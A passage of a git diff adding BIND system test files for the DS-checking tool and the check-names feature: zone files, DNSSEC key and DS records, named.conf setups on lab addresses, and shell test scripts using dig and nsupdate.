mjRcov4ttbImhD5jrLAZIfjO6DSazGNVFf/x + 6rjxjrc8SISPkt2xYwcOlYch9OZuoH86wcZu + 3Don6yAnLDYDrZylAA== ) diff --git a/bin/tests/system/checkdstool/prep.example.ds.db b/bin/tests/system/checkdstool/prep.example.ds.db new file mode 100644 index 0000000..dddcad6 --- /dev/null +++ b/bin/tests/system/checkdstool/prep.example.ds.db @@ -0,0 +1,2 @@ +prep.example. IN DS 65482 8 1 F3673708FBADDEC3EB55933E2E393ACE85EAC2BB +prep.example. IN DS 65482 8 2 51A7C97AAC42803DA515D1CAFEE28031A5018F6345F12F4B6C1B6D20 02B59820 diff --git a/bin/tests/system/checkdstool/tests.sh b/bin/tests/system/checkdstool/tests.sh new file mode 100644 index 0000000..4248b11 --- /dev/null +++ b/bin/tests/system/checkdstool/tests.sh @@ -0,0 +1,117 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if [ "$CYGWIN" ]; then + DIG=".\dig.bat" + WINDSFROMKEY=`cygpath -w $DSFROMKEY` + CHECKDS="$CHECKDS -a sha1 -a sha256 -d $DIG -D $WINDSFROMKEY" +else + DIG="./dig.sh" + CHECKDS="$CHECKDS -a sha1 -a sha256 -d $DIG -D $DSFROMKEY" +fi +chmod +x $DIG + +status=0 +n=1 + +echo_i "checking for correct DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS ok.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for correct DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f ok.example.dnskey.db ok.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for incorrect DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS wrong.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for incorrect DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f wrong.example.dnskey.db wrong.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for partially missing DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS missing.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-1.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for partially missing DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f missing.example.dnskey.db missing.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-1.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*missing' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for entirely missing DS, looking up key via 'dig' ($n)" +ret=0 +$CHECKDS none.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking for entirely missing DS, obtaining key from file ($n)" +ret=0 +$CHECKDS -f none.example.dnskey.db none.example > checkds.out.$n 2>&1 && ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking with prepared dsset file ($n)" +ret=0 +$CHECKDS -f prep.example.db -s prep.example.ds.db prep.example > checkds.out.$n 2>&1 || ret=1 +grep 'SHA-1.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +grep 'SHA-256.*found' checkds.out.$n > /dev/null 2>&1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if [ $status = 0 ]; then $SHELL clean.sh; fi +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/checkdstool/wrong.example.dnskey.db b/bin/tests/system/checkdstool/wrong.example.dnskey.db new file mode 100644 index 0000000..cc5bfd6 --- /dev/null +++ b/bin/tests/system/checkdstool/wrong.example.dnskey.db @@ -0,0 +1,2 @@ +wrong.example. 3600 IN DNSKEY 257 3 5 AwEAAc6Cz10GXEh5lxA9ujTY/QarTajcUOBwwBYIeldjRsgoouK/UioY FYgxEFL0O5JK6YCRUoGzl3EgLr5GvNyhIp1PZpOpHf7o/4MVOZTGJzm/ sHWP5B+KcYjQOxJiDb433iCmRM4DpHPUUoxw0QbZglzAzl5MfKBoyZud lH59DdT/50bkBg8iVu35EzuW0SYt31k70hxHBSb2wAGWeqxEPKJ1nQiI UcrWNDeem7byrqjPN9wyZhq0XkQ9qbcYxAkRNd8Y7P0FyR1YKJMc6SWZ Ru7muvxqTHgCtJVgxVz4qndCFKdYidiDeKe2/X/z5gf7pyYl3549O8JR tWdNKqutppk= +wrong.example. 3600 IN DNSKEY 256 3 5 BQEAAAAB2F1v2HWzCCE9vNsKfk0K8vd4EBwizNT9KO6WYXj0oxEL4eOJ aXbax/BzPFx+3qO8B8pu8E/JjkWH0oaYz4guUyTVmT5Eelg44Vb1kssy q8W27oQ+9qNiP8Jv6zdOj0uCB/N0fxfVL3371xbednFqoECfSFDZa6Hw jU1qzveSsW0= diff --git a/bin/tests/system/checkdstool/wrong.example.ds.db b/bin/tests/system/checkdstool/wrong.example.ds.db new file mode 100644 index 0000000..d7df610 --- /dev/null +++ b/bin/tests/system/checkdstool/wrong.example.ds.db @@ -0,0 +1,2 @@ +wrong.example. 3600 IN DS 1192 5 1 684BB5119673C9272A0A7582AF8576561B5D80EC +wrong.example. 3600 IN DS 1192 5 2 14E4A873360E512CD2E8C2C331C4472F5EDAB0736669901F4D42E976 3D7B1F5C diff --git a/bin/tests/system/checknames/clean.sh b/bin/tests/system/checknames/clean.sh new file mode 100644 index 0000000..fcbd504 --- /dev/null +++ b/bin/tests/system/checknames/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f dig.out.ns?.test* +rm -f nsupdate.out.test* +rm -f ns1/*.example.db +rm -f ns1/*.update.db +rm -f ns1/*.update.db.jnl +rm -f ns4/*.update.db +rm -f ns4/*.update.db.jnl +rm -f ns5/*.update.db +rm -f ns5/*.update.db.jnl +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/checknames/ns1/fail.example.db.in b/bin/tests/system/checknames/ns1/fail.example.db.in new file mode 100644 index 0000000..c4c06c3 --- /dev/null +++ b/bin/tests/system/checknames/ns1/fail.example.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.fail.example. hostmaster.fail.example. ( + 1 3600 1200 604800 3600 ) + NS ns1.fail.example. +ns1.fail.example. A 10.53.0.1 +xx_xx.fail.example. A 127.0.0.1 diff --git a/bin/tests/system/checknames/ns1/fail.update.db.in b/bin/tests/system/checknames/ns1/fail.update.db.in new file mode 100644 index 0000000..a360cfd --- /dev/null +++ b/bin/tests/system/checknames/ns1/fail.update.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.fail.update. hostmaster.fail.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.fail.update. +ns1.fail.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/ignore.example.db.in b/bin/tests/system/checknames/ns1/ignore.example.db.in new file mode 100644 index 0000000..148fa6a --- /dev/null +++ b/bin/tests/system/checknames/ns1/ignore.example.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.ignore.example. hostmaster.ignore.example. ( + 1 3600 1200 604800 3600 ) + NS ns1.ignore.example. +ns1.ignore.example. A 10.53.0.1 +yy_yy.ignore.example. A 10.53.0.1 +mx.ignore.example. MX 10 zz_zz.ignore.example. diff --git a/bin/tests/system/checknames/ns1/ignore.update.db.in b/bin/tests/system/checknames/ns1/ignore.update.db.in new file mode 100644 index 0000000..0925cef --- /dev/null +++ b/bin/tests/system/checknames/ns1/ignore.update.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.ignore.update. hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.ignore.update. +ns1.ignore.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/named.conf.in b/bin/tests/system/checknames/ns1/named.conf.in new file mode 100644 index 0000000..a6a3a66 --- /dev/null +++ b/bin/tests/system/checknames/ns1/named.conf.in @@ -0,0 +1,70 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; + check-integrity no; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "ignore.example" { + type primary; + file "ignore.example.db"; + check-names ignore; +}; + +zone "warn.example" { + type primary; + file "warn.example.db"; + check-names warn; +}; + +zone "fail.example" { + type primary; + file "fail.example.db"; + check-names fail; +}; + +zone "ignore.update" { + type primary; + file "ignore.update.db"; + allow-update { any; }; + check-names ignore; +}; + +zone "warn.update" { + type primary; + file "warn.update.db"; + allow-update { any; }; + check-names warn; +}; + +zone "fail.update" { + type primary; + file "fail.update.db"; + allow-update { any; }; + check-names fail; +}; diff --git a/bin/tests/system/checknames/ns1/root.db b/bin/tests/system/checknames/ns1/root.db new file mode 100644 index 0000000..bc026a5 --- /dev/null +++ b/bin/tests/system/checknames/ns1/root.db @@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1. hostmaster.warn.example. ( + 1 3600 1200 604800 3600 ) + NS ns1. +ns1. A 10.53.0.1 +; +ignore.example. NS ns1.ignore.example. +ns1.ignore.example. A 10.53.0.1 +warn.example. NS ns1.warn.example. +ns1.warn.example. A 10.53.0.1 +fail.example. NS ns1.fail.example. +ns1.fail.example. A 10.53.0.1 +; +ignore.update. NS ns1.ignore.update. +ns1.ignore.update. A 10.53.0.1 +warn.update. NS ns1.warn.update. +ns1.warn.update. A 10.53.0.1 +fail.update. NS ns1.fail.update. +ns1.fail.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/warn.example.db.in b/bin/tests/system/checknames/ns1/warn.example.db.in new file mode 100644 index 0000000..7b636fd --- /dev/null +++ b/bin/tests/system/checknames/ns1/warn.example.db.in @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.warn.example. hostmaster.warn.example. ( + 1 3600 1200 604800 3600 ) + NS ns1.warn.example. +ns1.warn.example. A 10.53.0.1 +xx_xx.warn.example. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns1/warn.update.db.in b/bin/tests/system/checknames/ns1/warn.update.db.in new file mode 100644 index 0000000..9a9af97 --- /dev/null +++ b/bin/tests/system/checknames/ns1/warn.update.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns1.warn.update. hostmaster.warn.update. ( + 1 3600 1200 604800 3600 ) + NS ns1.warn.update. +ns1.warn.update. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns2/named.conf.in b/bin/tests/system/checknames/ns2/named.conf.in new file mode 100644 index 0000000..3ba62e1 --- /dev/null +++ b/bin/tests/system/checknames/ns2/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names response warn; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; diff --git a/bin/tests/system/checknames/ns2/root.hints b/bin/tests/system/checknames/ns2/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns2/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns3/named.conf.in b/bin/tests/system/checknames/ns3/named.conf.in new file mode 100644 index 0000000..7c0cacb --- /dev/null +++ b/bin/tests/system/checknames/ns3/named.conf.in @@ -0,0 +1,31 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names response fail; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; diff --git a/bin/tests/system/checknames/ns3/root.hints b/bin/tests/system/checknames/ns3/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns3/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns4/named.conf.in b/bin/tests/system/checknames/ns4/named.conf.in new file mode 100644 index 0000000..f0cb870 --- /dev/null +++ b/bin/tests/system/checknames/ns4/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names primary ignore; + check-names secondary ignore; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +zone "primary-ignore.update" { + type primary; + file "primary-ignore.update.db"; + allow-update { any; }; +}; + +zone "master-ignore.update" { + type secondary; + primaries { 10.53.0.5; }; + file "secondary-ignore.update.db"; +}; diff --git a/bin/tests/system/checknames/ns4/primary-ignore.update.db.in b/bin/tests/system/checknames/ns4/primary-ignore.update.db.in new file mode 100644 index 0000000..b343cb1 --- /dev/null +++ b/bin/tests/system/checknames/ns4/primary-ignore.update.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns4 hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns4 + NS ns5 +ns4 A 10.53.0.4 +ns5 A 10.53.0.5 diff --git a/bin/tests/system/checknames/ns4/root.hints b/bin/tests/system/checknames/ns4/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns4/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/ns5/master-ignore.update.db.in b/bin/tests/system/checknames/ns5/master-ignore.update.db.in new file mode 100644 index 0000000..1057248 --- /dev/null +++ b/bin/tests/system/checknames/ns5/master-ignore.update.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ SOA ns5. hostmaster.ignore.update. ( + 1 3600 1200 604800 3600 ) + NS ns4 + NS ns5 +ns4 A 10.53.0.4 +ns5 A 10.53.0.5 diff --git a/bin/tests/system/checknames/ns5/named.conf.in b/bin/tests/system/checknames/ns5/named.conf.in new file mode 100644 index 0000000..1797aa1 --- /dev/null +++ b/bin/tests/system/checknames/ns5/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + check-names master ignore; + check-names slave ignore; + notify yes; +}; + +zone "." { + type hint; + file "root.hints"; +}; + +zone "master-ignore.update" { + type primary; + file "master-ignore.update.db"; + allow-update { any; }; +}; + +zone "primary-ignore.update" { + type secondary; + primaries { 10.53.0.4; }; + file "primary-ignore.update.db"; +}; diff --git a/bin/tests/system/checknames/ns5/root.hints b/bin/tests/system/checknames/ns5/root.hints new file mode 100644 index 0000000..5e89d74 --- /dev/null +++ b/bin/tests/system/checknames/ns5/root.hints @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. NS ns1. +ns1. A 10.53.0.1 diff --git a/bin/tests/system/checknames/setup.sh b/bin/tests/system/checknames/setup.sh new file mode 100644 index 0000000..9b3fb1d --- /dev/null +++ b/bin/tests/system/checknames/setup.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf + +cp ns1/ignore.example.db.in ns1/ignore.example.db +cp ns1/warn.example.db.in ns1/warn.example.db +cp ns1/fail.example.db.in ns1/fail.example.db + +cp ns1/ignore.update.db.in ns1/ignore.update.db +cp ns1/warn.update.db.in ns1/warn.update.db +cp ns1/fail.update.db.in ns1/fail.update.db + +cp ns4/primary-ignore.update.db.in ns4/primary-ignore.update.db + +cp ns5/master-ignore.update.db.in ns5/master-ignore.update.db diff --git a/bin/tests/system/checknames/tests.sh b/bin/tests/system/checknames/tests.sh new file mode 100644 index 0000000..0c36227 --- /dev/null +++ b/bin/tests/system/checknames/tests.sh @@ -0,0 +1,191 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" + +wait_for_record () { + $DIG $DIGOPTS "$1" "$2" "$3" > "$4" || return 1 + grep NOERROR "$4" > /dev/null || return 1 + return 0 +} + +# Entry should exist. +echo_i "check for failure from on zone load for 'check-names fail;' ($n)" +ret=0 +$DIG $DIGOPTS fail.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep SERVFAIL dig.out.ns1.test$n > /dev/null || ret=1 +grep 'xx_xx.fail.example: bad owner name (check-names)' ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist. +echo_i "check for warnings from on zone load for 'check-names warn;' ($n)" +ret=0 +grep 'xx_xx.warn.example: bad owner name (check-names)' ns1/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should not exist. +echo_i "check for warnings from on zone load for 'check-names ignore;' ($n)" +ret=1 +grep 'yy_yy.ignore.example: bad owner name (check-names)' ns1/named.run || ret=0 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response warn;' works ($n)" +ret=0 +$DIG $DIGOPTS +noauth yy_yy.ignore.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS +noauth yy_yy.ignore.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +digcomp dig.out.ns1.test$n dig.out.ns2.test$n || ret=1 +grep "check-names warning yy_yy.ignore.example/A/IN" ns2/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response (owner) fails;' works ($n)" +ret=0 +$DIG $DIGOPTS yy_yy.ignore.example. @10.53.0.1 a > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS yy_yy.ignore.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +grep REFUSED dig.out.ns3.test$n > /dev/null || ret=1 +grep "check-names failure yy_yy.ignore.example/A/IN" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +# Entry should exist +echo_i "check that 'check-names response (rdata) fails;' works ($n)" +ret=0 +$DIG $DIGOPTS mx.ignore.example. @10.53.0.1 MX > dig.out.ns1.test$n || ret=1 +$DIG $DIGOPTS mx.ignore.example. @10.53.0.3 MX > dig.out.ns3.test$n || ret=1 +grep NOERROR dig.out.ns1.test$n > /dev/null || ret=1 +grep SERVFAIL dig.out.ns3.test$n > /dev/null || ret=1 +grep "check-names failure mx.ignore.example/MX/IN" ns3/named.run > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "check that updates to 'check-names fail;' are rejected ($n)" +ret=0 +not=1 +$NSUPDATE -d <<END > nsupdate.out.test$n 2>&1 || not=0 +check-names off +server 10.53.0.1 ${PORT} +update add xxx_xxx.fail.update. 600 A 10.10.10.1 +send +END +if [ $not != 0 ]; then ret=1; fi +$DIG $DIGOPTS xxx_xxx.fail.update @10.53.0.1 A > 